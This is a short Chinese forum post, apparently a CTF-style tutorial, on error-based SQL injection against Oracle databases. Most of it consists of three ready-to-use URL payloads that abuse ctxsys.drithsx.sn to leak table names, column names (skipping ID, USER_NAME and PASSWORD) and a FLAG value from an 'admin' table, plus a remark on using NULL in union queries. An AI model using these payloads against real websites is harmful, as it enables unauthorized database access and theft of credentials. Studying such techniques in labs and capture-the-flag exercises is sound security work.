Oracle注入- 报错注入

繁夜   ·   发表于 2019-02-15 15:00:14   ·   技术文章投稿区

Oracle注入和mysql注入区别在于一些语句不同

比如联合查询不能用123查询 中间需要用NULL隔开


查表

?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))--+         

查列然后一个一个找

?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and column_name<>'ID' AND column_name<>'USER_NAME' AND column_name<>'PASSWORD'))--+ 


查flag

?id=1' and 1=ctxsys.drithsx.sn(1,(select FLAG_FLAG from admin))--+               


打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 775 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.